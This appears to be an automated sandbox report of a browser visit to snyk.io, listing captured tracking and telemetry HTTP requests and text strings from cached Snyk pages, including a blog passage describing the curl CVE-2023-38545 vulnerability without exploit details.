Source: global trafficHTTP traffic detected: GET /r?tid=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ0IjoxMDA5NzV9.8wrA1F2g0oW_q6PLLf3ezoxUwKH_70Qku-KFxC95cho HTTP/1.1Host: scout.salesloft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://snyk.ioSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /unified/v1/master/getSubscriptions HTTP/1.1Host: js.zi-scripts.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /r?tid=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ0IjoxMDA5NzV9.8wrA1F2g0oW_q6PLLf3ezoxUwKH_70Qku-KFxC95cho HTTP/1.1Host: scout.salesloft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pixel/648751cc35d6eb864afa5399/?iszitag=true HTTP/1.1Host: ws.zoominfo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: text/javascriptvisited-url: https://snyk.io/schedule-a-demo/_vtok: MTczLjI1NC4yNTAuNzE=_zitok: 88c99248376ead0658001729799400sec-ch-ua-platform: "Windows"Accept: */*Origin: https://snyk.ioSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://snyk.io/schedule-a-demo/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /i HTTP/1.1Host: scout.salesloft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://snyk.ioSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/923832244/?random=1729799399572&cv=11&fst=1729799399572&bg=ffffff&guid=ON&async=1&gtm=45be4al0v9101588801z89131853231za201zb9131853231&gcd=13r3r3r3r5l1&dma=0&tag_exp=101533422~101686685~101794737~101823847&u_w=1280&u_h=1024&url=https%3A%2F%2Fsnyk.io%2Fschedule-a-demo%2F&hn=www.googleadservices.com&frm=0&tiba=See%20Snyk%20in%20action%20-%20Book%20a%20live%20demo%20%7C%20Snyk&did=dOThhZD&gdid=dOThhZD&npa=0&us_privacy=1YNY&pscdl=noapi&auid=1154500146.1729799382&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUlbwfC3-cM0XkYFW4o6DRhU2qf0VSy1rXNXaa-V2TjHz33272b01puxBsfb
Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /core?d=1&embedId=4479srg8vkz5&eId=4479srg8vkz5&region=US&forceShow=false&skipCampaigns=false&sessionId=33b92b4a-3857-4f99-b6b5-ba8f4819d7b3&sessionStarted=1729799400.741&campaignRefreshToken=6e028e55-17c7-4347-8e64-68f1dad2ce32&hideController=false&pageLoadStartTime=1729799362127&mode=CHAT&driftEnableLog=false&secureIframe=false&u=https%3A%2F%2Fsnyk.io%2Fschedule-a-demo%2F HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1729799362127 HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /include/1729799400000/4479srg8vkz5.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: chromecache_367.2.dr, chromecache_526.2.drString found in binary or memory: 2024 Snyk Limited\nRegistered in England and Wales","nodeType":"text"}],"nodeType":"paragraph"}],"nodeType":"document"},"__typename":"NavigationFooterCopyright"},"socials":{"__typename":"NavigationFooterSocialsCollection","items":[{"sys":{"id":"1hUkRpvsCJkQjIYW7h3PGj","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"twitter","url":"https://twitter.com/snyksec"},{"sys":{"id":"3s1NrW9fhAI49a1BRjNfuy","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"youtube","url":"https://www.youtube.com/channel/UCh4dJzctb0NhSibjU-e2P6w"},{"sys":{"id":"3rrBjirF30sNI9d7rMS1My","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"linkedin","url":"https://www.linkedin.com/company/snyk"},{"sys":{"id":"5ksshlk24qSF9DaMjjmlwJ","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"github","url":"https://github.com/snyk/"},{"sys":{"id":"1wiC2aaT7Oqqvu5whdqpbK","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"npm","url":"https://www.npmjs.com/package/snyk"},{"sys":{"id":"3oljfTMGDpHJLspeMOU9Ht","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"discord","url":"https://snyk.co/discordcommunity"}]},"legalLinks":{"__typename":"NavigationFooterCategory","internalName":"\"Legal Links\" - footer category","label":"Legal Links","itemsCollection":{"__typename":"NavigationFooterCategoryItemsCollection","items":[{"sys":{"id":"2lBVAwbzP6bA0s72eGkqVj","__typename":"Sys"},"__typename":"ContentNavigationItem","url":"/policies/terms-of-service/","label":"Legal terms"},{"sys":{"id":"4qfdIeuRXOwlTWtTkfjxyw","__typename":"Sys"},"__typename":"ContentNavigationItem","url":"/policies/privacy/","label":"Privacy Notice"},{"sys":{"id":"1FdFFwoO1Sg45Wzq2N4xog","__typename":"Sys"},"__typename":"ContentNavigationItem","url":"/policies/website-terms-of-use","label":"Website Terms of Use"},{"sys":{"id":"4a4qXx1obXR2RbKLgEq551","__typename":"Sys"},"__typename":"ContentNavigationItem","url":"https://preferences.snyk.io/dont_sell","label":"For California residents: Do not sell my personal information"}]}}},"locale":"en-US","isPreview":false},"__N_SSG":true} equals www.linkedin.com (Linkedin)
Source: chromecache_367.2.dr, chromecache_526.2.drString found in binary or memory: 2024 Snyk Limited\nRegistered in England and Wales","nodeType":"text"}],"nodeType":"paragraph"}],"nodeType":"document"},"__typename":"NavigationFooterCopyright"},"socials":{"__typename":"NavigationFooterSocialsCollection","items":[{"sys":{"id":"1hUkRpvsCJkQjIYW7h3PGj","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"twitter","url":"https://twitter.com/snyksec"},{"sys":{"id":"3s1NrW9fhAI49a1BRjNfuy","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"youtube","url":"https://www.youtube.com/channel/UCh4dJzctb0NhSibjU-e2P6w"},{"sys":{"id":"3rrBjirF30sNI9d7rMS1My","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"linkedin","url":"https://www.linkedin.com/company/snyk"},{"sys":{"id":"5ksshlk24qSF9DaMjjmlwJ","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"github","url":"https://github.com/snyk/"},{"sys":{"id":"1wiC2aaT7Oqqvu5whdqpbK","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"npm","url":"https://www.npmjs.com/package/snyk"},{"sys":{"id":"3oljfTMGDpHJLspeMOU9Ht","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"discord","url":"https://snyk.co/discordcommunity"}]},"legalLinks":{"__typename":"NavigationFooterCategory","internalName":"\"Legal Links\" - footer category","label":"Legal Links","itemsCollection":{"__typename":"NavigationFooterCategoryItemsCollection","items":[{"sys":{"id":"2lBVAwbzP6bA0s72eGkqVj","__typename":"Sys"},"__typename":"ContentNavigationItem","url":"/policies/terms-of-service/","label":"Legal terms"},{"sys":{"id":"4qfdIeuRXOwlTWtTkfjxyw","__typename":"Sys"},"__typename":"ContentNavigationItem","url":"/policies/privacy/","label":"Privacy Notice"},{"sys":{"id":"1FdFFwoO1Sg45Wzq2N4xog","__typename":"Sys"},"__typename":"ContentNavigationItem","url":"/policies/website-terms-of-use","label":"Website Terms of Use"},{"sys":{"id":"4a4qXx1obXR2RbKLgEq551","__typename":"Sys"},"__typename":"ContentNavigationItem","url":"https://preferences.snyk.io/dont_sell","label":"For California residents: Do not sell my personal information"}]}}},"locale":"en-US","isPreview":false},"__N_SSG":true} equals www.twitter.com (Twitter)
Source: chromecache_367.2.dr, chromecache_526.2.drString found in binary or memory: 2024 Snyk Limited\nRegistered in England and Wales","nodeType":"text"}],"nodeType":"paragraph"}],"nodeType":"document"},"__typename":"NavigationFooterCopyright"},"socials":{"__typename":"NavigationFooterSocialsCollection","items":[{"sys":{"id":"1hUkRpvsCJkQjIYW7h3PGj","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"twitter","url":"https://twitter.com/snyksec"},{"sys":{"id":"3s1NrW9fhAI49a1BRjNfuy","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"youtube","url":"https://www.youtube.com/channel/UCh4dJzctb0NhSibjU-e2P6w"},{"sys":{"id":"3rrBjirF30sNI9d7rMS1My","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"linkedin","url":"https://www.linkedin.com/company/snyk"},{"sys":{"id":"5ksshlk24qSF9DaMjjmlwJ","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"github","url":"https://github.com/snyk/"},{"sys":{"id":"1wiC2aaT7Oqqvu5whdqpbK","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"npm","url":"https://www.npmjs.com/package/snyk"},{"sys":{"id":"3oljfTMGDpHJLspeMOU9Ht","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"discord","url":"https://snyk.co/discordcommunity"}]},"legalLinks":{"__typename":"NavigationFooterCategory","internalName":"\"Legal Links\" - footer category","label":"Legal Links","itemsCollection":{"__typename":"NavigationFooterCategoryItemsCollection","items":[{"sys":{"id":"2lBVAwbzP6bA0s72eGkqVj","__typename":"Sys"},"__typename":"ContentNavigationItem","url":"/policies/terms-of-service/","label":"Legal terms"},{"sys":{"id":"4qfdIeuRXOwlTWtTkfjxyw","__typename":"Sys"},"__typename":"ContentNavigationItem","url":"/policies/privacy/","label":"Privacy Notice"},{"sys":{"id":"1FdFFwoO1Sg45Wzq2N4xog","__typename":"Sys"},"__typename":"ContentNavigationItem","url":"/policies/website-terms-of-use","label":"Website Terms of Use"},{"sys":{"id":"4a4qXx1obXR2RbKLgEq551","__typename":"Sys"},"__typename":"ContentNavigationItem","url":"https://preferences.snyk.io/dont_sell","label":"For California residents: Do not sell my personal information"}]}}},"locale":"en-US","isPreview":false},"__N_SSG":true} equals www.youtube.com (Youtube)
Source: chromecache_260.2.dr, chromecache_612.2.drString found in binary or memory: and even then it's a limited charset heap overflow. Heap overflows in modern systems are extremely difficult to turn into an arbitrary code execution (ACE); hence the high-complexity exploit.","nodeType":"text"}],"nodeType":"paragraph"},{"data":{},"content":[{"data":{},"marks":[],"value":"Now that the vulnerability is published and tracked, you can use Snyk's reporting feature to find impacted projects by selecting your org and then choosing ","nodeType":"text"},{"data":{},"marks":[{"type":"bold"}],"value":"Reports","nodeType":"text"},{"data":{},"marks":[],"value":" in the sidebar. Select ","nodeType":"text"},{"data":{},"marks":[{"type":"bold"}],"value":"+Add Filter","nodeType":"text"},{"data":{},"marks":[],"value":" under issue details, select ","nodeType":"text"},{"data":{},"marks":[{"type":"bold"}],"value":"CVE","nodeType":"text"},{"data":{},"marks":[],"value":", then enter the CVE number: ","nodeType":"text"},{"data":{},"marks":[{"type":"code"}],"value":"CVE-2023-38545","nodeType":"text"}],"nodeType":"paragraph"},{"data":{"target":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"2MfDRCo81cyNAMPo9peEGx","type":"Entry","createdAt":"2023-10-11T15:16:40.568Z","updatedAt":"2024-07-11T22:15:43.202Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":18,"revision":4,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"contentCloudinaryAsset"}},"locale":"en-US"},"fields":{"internalName":"\"blog-curl-vuln-filter.png\" - original","asset":[{"url":"http://res.cloudinary.com/snyk/image/upload/v1697037268/blog-curl-vuln-filter.png","tags":[],"type":"upload","bytes":338868,"width":1920,"format":"png","height":1080,"version":1697037268,"duration":null,"metadata":[],"public_id":"blog-curl-vuln-filter","created_at":"2023-10-11T15:14:28Z","secure_url":"https://res.cloudinary.com/snyk/image/upload/v1697037268/blog-curl-vuln-filter.png","resource_type":"image"}],"maxWidth":"full","caption":"Filter your view down to CVE-2023-38545"}}},"content":[],"nodeType":"embedded-entry-block"},{"data":{},"content":[{"data":{},"marks":[],"value":"This blog will be updated with any new information as it comes up.","nodeType":"text"}],"nodeType":"paragraph"},{"data":{},"content":[{"data":{},"marks":[],"value":"Update: October 4, 2023","nodeType":"text"}],"nodeType":"heading-3"},{"data":{},"content":[{"data":{},"marks":[],"value":"On October 3, 2023, Daniel Stenberg, the long-time ","nodeType":"text"},{"data":{},"marks":[{"type":"code"}],"value":"curl","nodeType":"text"},{"data":{},"marks":[],"value":" maintainer and original author, published a note on both ","nodeType":"text"},{"data":{"uri":"https://www.linkedin.com/posts/danielstenberg_curl-activity-7114871742585577472-4OuW/"},"content":[{"data":{},"marks":[{"type":"underline"}],"value":"LinkedIn","nodeType":"text"}],"nodeType":"hyperlink"},{"data":{},"marks":[],"value":" and ","nodeType":"text
Source: chromecache_260.2.dr, chromecache_612.2.drString found in binary or memory: and even then it's a limited charset heap overflow. Heap overflows in modern systems are extremely difficult to turn into an arbitrary code execution (ACE); hence the high-complexity exploit.","nodeType":"text"}],"nodeType":"paragraph"},{"data":{},"content":[{"data":{},"marks":[],"value":"Now that the vulnerability is published and tracked, you can use Snyk's reporting feature to find impacted projects by selecting your org and then choosing ","nodeType":"text"},{"data":{},"marks":[{"type":"bold"}],"value":"Reports","nodeType":"text"},{"data":{},"marks":[],"value":" in the sidebar. Select ","nodeType":"text"},{"data":{},"marks":[{"type":"bold"}],"value":"+Add Filter","nodeType":"text"},{"data":{},"marks":[],"value":" under issue details, select ","nodeType":"text"},{"data":{},"marks":[{"type":"bold"}],"value":"CVE","nodeType":"text"},{"data":{},"marks":[],"value":", then enter the CVE number: ","nodeType":"text"},{"data":{},"marks":[{"type":"code"}],"value":"CVE-2023-38545","nodeType":"text"}],"nodeType":"paragraph"},{"data":{"target":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"2MfDRCo81cyNAMPo9peEGx","type":"Entry","createdAt":"2023-10-11T15:16:40.568Z","updatedAt":"2024-07-11T22:15:43.202Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":18,"revision":4,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"contentCloudinaryAsset"}},"locale":"en-US"},"fields":{"internalName":"\"blog-curl-vuln-filter.png\" - original","asset":[{"url":"http://res.cloudinary.com/snyk/image/upload/v1697037268/blog-curl-vuln-filter.png","tags":[],"type":"upload","bytes":338868,"width":1920,"format":"png","height":1080,"version":1697037268,"duration":null,"metadata":[],"public_id":"blog-curl-vuln-filter","created_at":"2023-10-11T15:14:28Z","secure_url":"https://res.cloudinary.com/snyk/image/upload/v1697037268/blog-curl-vuln-filter.png","resource_type":"image"}],"maxWidth":"full","caption":"Filter your view down to CVE-2023-38545"}}},"content":[],"nodeType":"embedded-entry-block"},{"data":{},"content":[{"data":{},"marks":[],"value":"This blog will be updated with any new information as it comes up.","nodeType":"text"}],"nodeType":"paragraph"},{"data":{},"content":[{"data":{},"marks":[],"value":"Update: October 4, 2023","nodeType":"text"}],"nodeType":"heading-3"},{"data":{},"content":[{"data":{},"marks":[],"value":"On October 3, 2023, Daniel Stenberg, the long-time ","nodeType":"text"},{"data":{},"marks":[{"type":"code"}],"value":"curl","nodeType":"text"},{"data":{},"marks":[],"value":" maintainer and original author, published a note on both ","nodeType":"text"},{"data":{"uri":"https://www.linkedin.com/posts/danielstenberg_curl-activity-7114871742585577472-4OuW/"},"content":[{"data":{},"marks":[{"type":"underline"}],"value":"LinkedIn","nodeType":"text"}],"nodeType":"hyperlink"},{"data":{},"marks":[],"value":" and ","nodeType":"text
Source: chromecache_556.2.drString found in binary or memory: without overwhelming developers. But what does a successful approach look like?","nodeType":"text"}],"nodeType":"paragraph"},{"data":{},"content":[{"data":{},"marks":[],"value":"Our very own ","nodeType":"text"},{"data":{"uri":"https://www.linkedin.com/in/simonmaple/?originalSubdomain=uk"},"content":[{"data":{},"marks":[],"value":"Simon Maple","nodeType":"text"}],"nodeType":"hyperlink"},{"data":{},"marks":[],"value":" (Field CTO, Snyk) talked with ","nodeType":"text"},{"data":{"uri":"https://www.linkedin.com/in/kalpeshdharwadkar/"},"content":[{"data":{},"marks":[],"value":"Kalpesh Dharwadkar","nodeType":"text"}],"nodeType":"hyperlink"},{"data":{},"marks":[],"value":" (Product Security Engineer, Pinterest) to learn how Pinterest uses Snyk to build developer-friendly security practices.","nodeType":"text"}],"nodeType":"paragraph"},{"data":{},"content":[{"data":{},"marks":[],"value":"Three big priorities: visibility, scanning, and triage","nodeType":"text"}],"nodeType":"heading-2"},{"data":{},"content":[{"data":{},"marks":[],"value":"Pinterest uses a lot of open source software in their development stack, so a vulnerable open source library can definitely affect their executive profile. Before Kalpesh joined the company, they used an ad hoc system of building views into their open source libraries using NPM audit. But when Kalpesh joined, he wanted to set up a centralized system for getting visibility across all open source libraries in use. His team evaluated numerous solutions and chose Snyk for two main reasons: its developer-friendly features, and support for language-specific repos such as Bazel (their chosen build tool). equals www.linkedin.com (Linkedin)
Source: chromecache_454.2.drString found in binary or memory: ","marks":[],"data":{}}]},{"nodeType":"paragraph","data":{},"content":[{"nodeType":"text","value":"Talent Infusion","marks":[{"type":"bold"}],"data":{}}]},{"nodeType":"paragraph","data":{},"content":[{"nodeType":"text","value":"Snyk now employs more than 1,100 employees worldwide, augmented by current hiring pushes in ","marks":[],"data":{}},{"nodeType":"hyperlink","data":{"uri":"https://www.linkedin.com/organization/10043614/campaign/0eac7e41-95d7-43d9-8275-2b5435761f2f/"},"content":[{"nodeType":"text","value":"Boston","marks":[{"type":"underline"}],"data":{}}]},{"nodeType":"text","value":" and ","marks":[],"data":{}},{"nodeType":"hyperlink","data":{"uri":"https://www.linkedin.com/organization/10043614/campaign/adb562c4-35a9-4039-bbe3-3ed54d7c0f0e/"},"content":[{"nodeType":"text","value":"London","marks":[{"type":"underline"}],"data":{}}]},{"nodeType":"text","value":".","marks":[],"data":{}}]},{"nodeType":"paragraph","data":{},"content":[{"nodeType":"text","value":"In 2024, the company also significantly bolstered their ","marks":[],"data":{}},{"nodeType":"hyperlink","data":{"uri":"/about/leadership/"},"content":[{"nodeType":"text","value":"Leadership Team","marks":[{"type":"underline"}],"data":{}}]},{"nodeType":"text","value":", further solidifying Snyk equals www.linkedin.com (Linkedin)
Source: chromecache_321.2.drString found in binary or memory: <!DOCTYPE html><html lang="en-US"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width"/><title>Developer security | Snyk</title><meta name="robots" content="index,follow,max-image-preview:large"/><meta name="description" content="Enable developers to build securely from the start while giving security teams complete visibility and comprehensive controls."/><link rel="alternate" hrefLang="x-default" href="https://snyk.io/"/><link rel="alternate" hrefLang="en" href="https://snyk.io/"/><link rel="alternate" hrefLang="de" href="https://snyk.io/de/"/><link rel="alternate" hrefLang="fr" href="https://snyk.io/fr/"/><link rel="alternate" hrefLang="ja" href="https://snyk.io/jp/"/><link rel="alternate" hrefLang="pt-BR" href="https://snyk.io/pt-BR/"/><meta name="twitter:card" content="summary_large_image"/><meta property="og:title" content="Developer security | Snyk"/><meta property="og:description" content="Enable developers to build securely from the start while giving security teams complete visibility and comprehensive controls."/><meta property="og:url" content="https://snyk.io/"/><meta property="og:type" content="website"/><meta property="og:image" content="/_next/static/media/default-snyk.8953a9bd.jpg"/><meta property="og:image:alt" content="Snyk | Developer Security Platform"/><meta property="og:image:width" content="1200"/><meta property="og:image:height" content="628"/><meta property="og:locale" content="en-US"/><meta property="og:site_name" content="Snyk"/><link rel="canonical" href="https://snyk.io/"/><link rel="preload" href="https://res.cloudinary.com/snyk/image/upload/v1729618965/default-report.b205b2e0.svg" as="image" fetchpriority="high"/><link rel="preload" as="image" imageSrcSet="/_next/image/?url=https%3A%2F%2Fres.cloudinary.com%2Fsnyk%2Fimage%2Fupload%2Fv1717461856%2Ffeature-snyk-snowflake.jpg&amp;w=384&amp;q=75 384w, /_next/image/?url=https%3A%2F%2Fres.cloudinary.com%2Fsnyk%2Fimage%2Fupload%2Fv1717461856%2Ffeature-snyk-snowflake.jpg&amp;w=580&amp;q=75 580w, /_next/image/?url=https%3A%2F%2Fres.cloudinary.com%2Fsnyk%2Fimage%2Fupload%2Fv1717461856%2Ffeature-snyk-snowflake.jpg&amp;w=960&amp;q=75 960w, /_next/image/?url=https%3A%2F%2Fres.cloudinary.com%2Fsnyk%2Fimage%2Fupload%2Fv1717461856%2Ffeature-snyk-snowflake.jpg&amp;w=1240&amp;q=75 1240w, /_next/image/?url=https%3A%2F%2Fres.cloudinary.com%2Fsnyk%2Fimage%2Fupload%2Fv1717461856%2Ffeature-snyk-snowflake.jpg&amp;w=2560&amp;q=75 2560w" imageSizes="(min-width: 980px) 50vw, 100vw" fetchpriority="high"/><link rel="preload" as="image" imageSrcSet="/_next/image/?url=https%3A%2F%2Fres.cloudinary.com%2Fsnyk%2Fimage%2Fupload%2Fv1727870043%2Ffeature-code-rise.png&amp;w=384&amp;q=75 384w, /_next/image/?url=https%3A%2F%2Fres.cloudinary.com%2Fsnyk%2Fimage%2Fupload%2Fv1727870043%2Ffeature-code-rise.png&amp;w=580&amp;q=75 580w, /_next/image/?url=https%3A%2F%2Fres.cloudinary.com%2Fsnyk%2Fimage%2Fupload%2Fv1727870043%2Ffeature-code-rise.png&amp;w=960&amp;q=75 960w, /_next/image/
Source: chromecache_321.2.drString found in binary or memory: <!DOCTYPE html><html lang="en-US"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width"/><title>Developer security | Snyk</title><meta name="robots" content="index,follow,max-image-preview:large"/><meta name="description" content="Enable developers to build securely from the start while giving security teams complete visibility and comprehensive controls."/><link rel="alternate" hrefLang="x-default" href="https://snyk.io/"/><link rel="alternate" hrefLang="en" href="https://snyk.io/"/><link rel="alternate" hrefLang="de" href="https://snyk.io/de/"/><link rel="alternate" hrefLang="fr" href="https://snyk.io/fr/"/><link rel="alternate" hrefLang="ja" href="https://snyk.io/jp/"/><link rel="alternate" hrefLang="pt-BR" href="https://snyk.io/pt-BR/"/><meta name="twitter:card" content="summary_large_image"/><meta property="og:title" content="Developer security | Snyk"/><meta property="og:description" content="Enable developers to build securely from the start while giving security teams complete visibility and comprehensive controls."/><meta property="og:url" content="https://snyk.io/"/><meta property="og:type" content="website"/><meta property="og:image" content="/_next/static/media/default-snyk.8953a9bd.jpg"/><meta property="og:image:alt" content="Snyk | Developer Security Platform"/><meta property="og:image:width" content="1200"/><meta property="og:image:height" content="628"/><meta property="og:locale" content="en-US"/><meta property="og:site_name" content="Snyk"/><link rel="canonical" href="https://snyk.io/"/><link rel="preload" href="https://res.cloudinary.com/snyk/image/upload/v1729618965/default-report.b205b2e0.svg" as="image" fetchpriority="high"/><link rel="preload" as="image" 